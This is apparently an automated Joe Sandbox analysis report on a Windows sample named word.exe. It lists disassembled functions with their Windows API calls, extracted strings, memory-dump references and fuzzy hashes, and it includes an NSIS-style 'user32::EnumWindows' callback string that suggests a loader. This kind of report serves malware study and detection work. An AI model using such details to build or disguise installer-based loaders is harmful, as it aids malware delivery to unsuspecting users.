Instruction Fuzzy Hash: B5C0803440D784E7E520471054245677FF0AB51701F14845AF0C163151D134B840AF16

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Non-executed Functions

Function 00404959 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404971
GetDlgItem.USER32(?,00000408), ref: 0040497C
GlobalAlloc.KERNEL32(?,?), ref: 004049C6
LoadBitmapA.USER32(0000006E), ref: 004049D9
SetWindowLongA.USER32(?,?,00404F50), ref: 004049F2
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404A06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A4C
DeleteObject.GDI32(00000000), ref: 00404A4F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
GetWindowLongA.USER32(?,?), ref: 00404B89
SetWindowLongA.USER32(?,?,00000000), ref: 00404B97
ShowWindow.USER32(?,00000005), ref: 00404BA8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
SendMessageA.USER32(?,?,00000000,00000000), ref: 00404D1F
SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D43
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
ImageList_Destroy.COMCTL32(?), ref: 00404D78
GlobalFree.KERNEL32(?), ref: 00404D88
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
ShowWindow.USER32(?,00000000), ref: 00404F27
GetDlgItem.USER32(?,000003FE), ref: 00404F32
ShowWindow.USER32(00000000), ref: 00404F39

Strings

N, xrefs: 00404BE3
+/R, xrefs: 00404EDF
M, xrefs: 00404B02
, xrefs: 00404F11

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $+/R$M$N
API String ID: 1638840714-1472796484
Opcode ID: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
Opcode Fuzzy Hash: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58

Function 0040511A Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040517A
GetDlgItem.USER32(?,000003EE), ref: 00405189
GetClientRect.USER32(?,?), ref: 004051C6
GetSystemMetrics.USER32(00000015), ref: 004051CE
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
ShowWindow.USER32(?,?), ref: 0040526A
GetDlgItem.USER32(?,000003EC), ref: 0040528B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
GetDlgItem.USER32(?,000003F8), ref: 00405198

Part of subcall function 00404021: SendMessageA.USER32(?,?,00000001,00403E52), ref: 0040402F

GetDlgItem.USER32(?,000003EC), ref: 004052DC
CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
CloseHandle.KERNEL32(00000000), ref: 004052F1
ShowWindow.USER32(00000000), ref: 00405314
ShowWindow.USER32(?,?), ref: 0040531B
ShowWindow.USER32(?), ref: 00405361
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
CreatePopupMenu.USER32 ref: 004053A6
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
GetWindowRect.USER32(?,000000FF), ref: 004053DB
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004053F4
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
OpenClipboard.USER32(00000000), ref: 00405440
EmptyClipboard.USER32 ref: 00405446
GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
GlobalLock.KERNEL32(00000000), ref: 00405459
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
GlobalUnlock.KERNEL32(00000000), ref: 00405486
SetClipboardData.USER32(00000001,00000000), ref: 00405491
CloseClipboard.USER32 ref: 00405497

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 3a7fd544d37bc8c1aecbdfced25bc3ec019ee290ee59522c4131774be6385cee
Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
Opcode Fuzzy Hash: 3a7fd544d37bc8c1aecbdfced25bc3ec019ee290ee59522c4131774be6385cee
Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69

Function 0040442A Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404479
SetWindowTextA.USER32(00000000,?), ref: 004044A3
SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
CoTaskMemFree.OLE32(00000000), ref: 0040455F
lstrcmpiA.KERNEL32(Call,0041FCF8), ref: 00404591
lstrcatA.KERNEL32(?,Call), ref: 0040459D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF

Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6

GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE

Strings

A, xrefs: 0040454D
+/R, xrefs: 004046CD
C:\Users\user\spherosome\preadoption\preembodiment, xrefs: 0040457A
user32::EnumWindows(i r1 ,i 0), xrefs: 00404443
Call, xrefs: 0040458B, 00404590, 0040459B

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: +/R$A$C:\Users\user\spherosome\preadoption\preembodiment$Call$user32::EnumWindows(i r1 ,i 0)
API String ID: 2246997448-1321296175
Opcode ID: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
Opcode Fuzzy Hash: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69

Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e358676071c9ad12ca9a4f5b1acad345144818a224037d499fe1875a9964c843
Instruction ID: e095c2a4769a5e18af137d5e24cc0f066a76803936003d94c8e443da5dd33856
Opcode Fuzzy Hash: e358676071c9ad12ca9a4f5b1acad345144818a224037d499fe1875a9964c843
Instruction Fuzzy Hash: 58F0EC72508110EBD700E77499499EE7778DF51314F60457BF141F21C1D3B84941EB2A

Function 00403B19 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
ShowWindow.USER32(?), ref: 00403B72
DestroyWindow.USER32 ref: 00403B86
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
GetDlgItem.USER32(?,?), ref: 00403BC3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
IsWindowEnabled.USER32(00000000), ref: 00403BDE
GetDlgItem.USER32(?,00000001), ref: 00403C8C
GetDlgItem.USER32(?,00000002), ref: 00403C96
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
GetDlgItem.USER32(?,00000003), ref: 00403DA7
ShowWindow.USER32(00000000,?), ref: 00403DC8
EnableWindow.USER32(?,?), ref: 00403DDA
EnableWindow.USER32(?,?), ref: 00403DF5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
EnableMenuItem.USER32(00000000), ref: 00403E12
SendMessageA.USER32(?,?,00000000,00000001), ref: 00403E2A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
lstrlenA.KERNEL32(0041FCF8,?,0041FCF8,00422F00), ref: 00403E66
SetWindowTextA.USER32(?,0041FCF8), ref: 00403E75
ShowWindow.USER32(?,0000000A), ref: 00403FA9

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
Opcode Fuzzy Hash: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E

Function 00404135 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
GetSysColor.USER32(?), ref: 00404203
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
lstrlenA.KERNEL32(?), ref: 00404224
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
GetDlgItem.USER32(?,0000040A), ref: 004042AA
SendMessageA.USER32(00000000), ref: 004042AD
GetDlgItem.USER32(?,000003E8), ref: 004042D8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
LoadCursorA.USER32(00000000,00007F02), ref: 00404327
SetCursor.USER32(00000000), ref: 00404330
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
LoadCursorA.USER32(00000000,00007F00), ref: 00404350
SetCursor.USER32(00000000), ref: 00404353
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
SendMessageA.USER32(?,00000000,00000000), ref: 00404393

Strings

N, xrefs: 004042C6
open, xrefs: 0040433B
+/R, xrefs: 00404155
Call, xrefs: 00404303

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: +/R$Call$N$open
API String ID: 3615053054-2612674847
Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99

Function 00405A29 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66

Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
wsprintfA.USER32 ref: 00405AA1
GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,?,00421E88,?,?,?,?,?), ref: 00405ADC
GlobalAlloc.KERNEL32(?,0000000A), ref: 00405AEB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
GlobalFree.KERNEL32(00000000), ref: 00405B92
CloseHandle.KERNEL32(00000000), ref: 00405B99

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Strings

[Rename], xrefs: 00405B0B, 00405B1D
NUL, xrefs: 00405A33
%s=%s, xrefs: 00405A97

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
Opcode Fuzzy Hash: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405F5C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6

Strings

"C:\Users\user\Desktop\word.exe", xrefs: 00405F98
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F5D, 00405F62
*?|<>/":, xrefs: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
